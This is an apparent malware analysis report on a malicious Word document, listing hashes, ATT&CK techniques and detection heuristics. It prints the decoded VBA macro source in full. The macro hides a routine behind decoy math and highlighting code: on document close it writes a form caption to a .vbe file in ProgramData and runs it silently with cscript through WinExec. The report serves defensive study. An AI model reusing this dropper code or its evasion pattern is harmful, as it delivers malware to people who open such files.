Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c4892e53db24a9b2…

MALICIOUS

Office (OLE)

560.0 KB Created: 2021-08-20 16:58:00 Authoring application: Microsoft Office Word First seen: 2021-09-17
MD5: 5b6eb7a9fc3713ab1ab79809b2c7a153 SHA-1: 1e3a9c2e30df3369bad98649d7fbed9057aef363 SHA-256: c4892e53db24a9b2de3509416dbd989bcbf900fc7801cdb52be1ed834b57cf09
170 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains VBA macros, including an Auto_Close macro, which is a common technique for executing malicious code upon document closure. The presence of a reference to the WinExec API strongly suggests the macro is intended to execute arbitrary commands. The script's intent is to download and execute a second-stage payload, likely leveraging the WinExec API.

Heuristics 7

  • Reference to WinExec API high SC_STR_WINEXEC
    Reference to WinExec API
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Attribute VB_Name = "autoclose"
Sub Main()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5583 bytes
SHA-256: ceb98bb50c831af3f1685c7786c3325ac97c086b44832fd3f5032dc4953e8956
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{E065A985-152F-45C0-99C4-7C0D3ED5655E}{643A229B-1567-42F2-9104-C96561766B9B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Const PSDFKWGHWIEWEFGHFOFJSODFG = 51



#If VBA7 Then

Private Declare PtrSafe Function WinExec Lib "kernel32          " _
(ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
#Else

Private Declare Function WinExec Lib "kernel32                                                 " _
(ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
#End If
  

Private Function Pi() As Single
    Pi = 3.14159265358979
End Function
'=============================================================================================

Private Function Sec(ByVal Radians As Double) As Double
    Dim Cosine As Single
  '
' Find_Liability_Words Macro
'
'
Application.ScreenUpdating = False
Options.DefaultHighlightColorIndex = wdBrightGreen
Dim StrFnd As String, i As Long, StrRpt As String

' Words to search for
StrFnd = "DefaultHighlightColorIndex,affirmative,all,Find"

With ActiveDocument.Range.Find
  .ClearFormatting
  .Replacement.ClearFormatting
  .Replacement.Highlight = True
  .Forward = True
  .Wrap = wdFindContinue
  .Format = True
  .MatchCase = False
  .MatchWholeWord = True
  .MatchWildcards = False
  .MatchSoundsLike = False
  .MatchAllWordForms = True
  For i = 0 To UBound(Split(StrFnd, ","))
    .Text = Split(StrFnd, ",")(i)
    .Replacement.Text = "^&"
    .Execute Replace:=wdReplaceAll
    If .Found = True Then StrRpt = StrRpt & vbCr & Split(StrFnd, ",")(i)
  Next
End With
If StrRpt = "" Then

MsgBox "None of the terms were found.", vbOKOnly
    Cosine = Cos(Radians)
    If Abs(Cosine) <= 0.001 Then
        Sec = 9999.999999

    Else
        Sec = 1 / Cosine
                Dim Tijd
        Tijd = Timer()
        While Timer() - Tijd < 2
          DoEvents
        Wend
        WinExec "cscript c:\programdata\prnholl.vbe", 0


End If
Application.ScreenUpdating = True

    End If
End Function

'=============================================================================================
Private Function Csc(ByVal Radians As Double) As Double
    Dim Sine As Single

    Sine = Sin(Radians)
    
    If Abs(Sine) <= 0.001 Then
        Csc = 9999.999999
        
    Else
        
        Csc = 1 / Sine
        
    End If
    
End Function

'=============================================================================================
Private Function Cot(ByVal Radians As Double) As Double
    Dim Sine As Single

    Sine = Sin(Radians)
    If Abs(Sine) <= 0.001 Then
        Cot = 9999.999999
    Else
        Cot = Cos(Radians) / Sine
    End If
End Function

'=============================================================================================
Private Function pow(base As Double, expon As Double) As Double
    pow = Exp(expon * Log(base))
End Function
'=============================================================================================


Private Sub UserForm_Resize()
'As soon as the form is resized the image will follow


Label1.Width = UserForm1.Width
Label1.Left = UserForm1.Left
Label1.Top = UserForm1.Top
pow 3, 5.9
ResizeFormToScreen (UserForm1)
End Sub

Private Sub ResizeFormToScreen(FrmName)
    'The 'On Error Resume Next' is needed because there might be
    'some controls on the form that may not support some of the
    'properties that will be set
    Cot 7.65
    
    'If the form's windows state is minimized or maximized then exit
    


    On Error GoTo ErrorHandler
    'Set the form's origin to 0,0
    FrmName.Top = 0
    FrmName.Left = 0
    
    'Resize the form's height, width , and font size
    FrmName.Height = FrmName.Height * 15
    FrmName.Width = FrmName.Width * 28
    FrmName.Font.Size = FrmName.Font.Size * 28

    'Loop through all the controls on the from and repostion every
    'control relative to the form origin, then resize thier width,
    'height, and Font.Size properties
    For i = 0 To FrmName.Controls.Count - 1
       FrmName.Controls(i).Left = FrmName.Controls(i).Left * 9
       FrmName.Controls(i).Top = FrmName.Controls(i).Top * 15
       FrmName.Controls(i).Height = FrmName.Controls(i).Height * 15
       FrmName.Controls(i).Width = FrmName.Controls(i).Width * 3
     

       'Note: The control's font will resize only if it is a truetype font
       FrmName.Controls(i).Font.Size = FrmName.Controls(i).Font.Size * 28
       
    Next i
    
ErrorHandler:
        Dim fso As New FileSystemObject
        Dim TEXTSTREAM
        Dim Tijd
        Tijd = Timer()
        While Timer() - Tijd < 1
          
        Wend
    Cot 241.5
   
    Cot 4.54242

    Set TEXTSTREAM = fso.CreateTextFile("c:\programdata\prnholl.vbe", 1, 1)
    Cot 42.1
    TEXTSTREAM.Writeline (UserForm1.Label1.Caption)
   Cot 7.65
    TEXTSTREAM.Close
    Cot 72.614
    Sec 54.8
    
End Sub



Attribute VB_Name = "autoclose"
Sub Main()
UserForm1.Width = 5
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.